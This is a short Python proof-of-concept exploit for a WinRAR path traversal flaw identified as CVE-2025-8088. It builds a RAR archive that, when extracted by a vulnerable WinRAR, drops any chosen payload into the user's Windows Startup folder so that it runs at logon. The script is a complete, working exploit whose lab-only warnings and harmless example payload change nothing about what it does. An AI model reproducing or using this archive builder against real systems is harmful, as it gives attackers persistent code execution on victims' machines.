import os
import shutil
import subprocess
import argparse
from pathlib import Path

def create_traversal_rar(payload_path, output_rar):
    # Path to WinRAR's CLI tool
    WINRAR_PATH = r"C:\Program Files\WinRAR\rar.exe"  # Change if different

    # Relative traversal path inside the archive
    TRAVERSAL_PATH = r"..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\" + os.path.basename(payload_path)

    # Temp folder for building archive
    temp_dir = Path(os.getcwd()) / "rar_temp"
    if temp_dir.exists():
        shutil.rmtree(temp_dir)
    temp_dir.mkdir(parents=True, exist_ok=True)

    # Create folder structure matching traversal path
    target_path = temp_dir / TRAVERSAL_PATH
    target_path.parent.mkdir(parents=True, exist_ok=True)

    # Copy payload to target location
    shutil.copy(payload_path, target_path)

    # Create the RAR using WinRAR's CLI
    cmd = [
        WINRAR_PATH,
        "a", "-ep", str(output_rar),
        str(TRAVERSAL_PATH)
    ]
    subprocess.run(cmd, cwd=temp_dir, check=True)

    print(f"[+] Created PoC RAR: {output_rar}")
    print("[!] Test ONLY in a lab with vulnerable WinRAR (< 7.13).")
    print("[!] On extraction, the file will be placed in the user's Startup folder.")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Safe PoC for CVE-2025-8088 path traversal in WinRAR")
    parser.add_argument("-p", "--payload", required=True, help="Path to harmless file to embed (e.g., calc.exe)")
    parser.add_argument("-o", "--output", required=True, help="Path to save the output RAR")
    args = parser.parse_args()

    create_traversal_rar(args.payload, args.output)